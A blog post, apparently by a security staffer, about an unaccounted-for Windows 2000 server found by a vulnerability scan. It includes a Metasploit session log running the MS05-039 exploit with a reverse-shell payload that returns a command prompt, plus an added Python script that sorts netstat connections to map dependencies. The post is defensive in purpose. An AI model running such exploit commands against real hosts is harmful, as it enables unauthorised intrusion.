Locating hosts
An interesting thing happened today. A vulnerability scan I ran over the weekend identified a rather vulnerable server. When I asked the local IT department about it they had no clue about it nor its physical location.
The server’s name indicates it’s probably 5-6 years old. It isn’t a member of our new domain, which was created 3-4 years ago. No one remembers the admin password nor the remote access password.
I was able to gain remote access using Metasploit (from my Mac) and I can now down the system if I need to. However, we don’t know what systems are dependent on it. Netstat does show active connections from other servers, so there is a chance of preventing access to some critical service if we shut down the box (which we still can’t physically locate).
+ -- --=[ msfconsole v2.6 [149 exploits - 76 payloads]
msf > use ms05_039_pnp
msf ms05_039_pnp(win32_reverse) > set TARGET 0
TARGET -> 0
msf ms05_039_pnp(win32_reverse) > set RHOST 192.168.2.38
RHOST -> 192.168.2.38
msf ms05_039_pnp(win32_reverse) > set LHOST 192.168.5.61
LHOST -> 192.168.5.61
msf ms05_039_pnp(win32_reverse) > set LPORT 1024
LPORT -> 1024
msf ms05_039_pnp(win32_reverse) > exploit
[*] Starting Reverse Handler.
[*] Detected a Windows 2000 target
[*] Sending request...
[*] Got connection from 192.168.5.61:1024 <-> 192.168.2.38:3459
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
C:\WINNT\system32>
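Before shutting down a box nobody can account for, the netstat connections mentioned above are the only dependency inventory available. The following is an added example (not from the original post): it parses Windows 2000 style `netstat -an` output, separates clients that connected to the server's own listening ports from sessions the server itself opened, and counts them per peer. The sample output is constructed; only the analyst's reverse shell (192.168.2.38:3459 to 192.168.5.61:1024) comes from the session shown.

```python
"""Triage `netstat -an` output from an unidentified server before shutting it down
(added example, not from the original post). Sessions arriving at one of the box's
LISTENING ports are clients that depend on it; everything else is the box reaching
out. The sample below is constructed; only the analyst's reverse shell is real."""
from collections import defaultdict

SAMPLE_NETSTAT = """
  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:1433           0.0.0.0:0              LISTENING
  TCP    192.168.2.38:445       192.168.2.10:1055      ESTABLISHED
  TCP    192.168.2.38:445       192.168.2.11:2201      ESTABLISHED
  TCP    192.168.2.38:1433      192.168.3.7:3344       ESTABLISHED
  TCP    192.168.2.38:1433      192.168.3.7:3345       ESTABLISHED
  TCP    192.168.2.38:1084      192.168.2.1:389        ESTABLISHED
  TCP    192.168.2.38:3459      192.168.5.61:1024      ESTABLISHED
  UDP    0.0.0.0:161            *:*
"""

def split_endpoint(endpoint):
    host, _, port = endpoint.rpartition(":")  # '192.168.2.38:445' -> host, 445
    return host, int(port)

def classify_connections(netstat_text):
    """Return (inbound, outbound): inbound maps remote host -> {service port: count},
    outbound maps (remote host, remote port) -> sessions this box itself opened."""
    listening, established = set(), []
    for line in netstat_text.splitlines():
        fields = line.split()
        if len(fields) < 4 or fields[0] != "TCP":
            continue  # skip the header and UDP, which carries no state to reason from
        local, foreign, state = fields[1], fields[2], fields[3]
        if state == "LISTENING":
            listening.add(split_endpoint(local)[1])  # any bound address counts
        elif state == "ESTABLISHED":
            established.append((split_endpoint(local), split_endpoint(foreign)))
    inbound = defaultdict(lambda: defaultdict(int))
    outbound = defaultdict(int)
    for (_, lport), (rhost, rport) in established:
        if lport in listening:
            inbound[rhost][lport] += 1  # a client using a service this box offers
        else:
            outbound[(rhost, rport)] += 1  # this box depending on another system
    return inbound, outbound

if __name__ == "__main__":
    clients, deps = classify_connections(SAMPLE_NETSTAT)
    print("inbound clients:", {h: dict(p) for h, p in clients.items()})
    print("outbound sessions:", dict(deps))
```

The inbound side is the list of systems to check with before pulling the plug; the outbound side (here the directory lookup on port 389 and the analyst's own shell) shows what the box itself relies on.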
To add insult to injury our network guru is out of the office today so he can’t do his switch-port magic to locate it.
This is a great example of why security teams should go through these drills periodically. I’d hate to have discovered this box once it was hammering our networks with a worm.
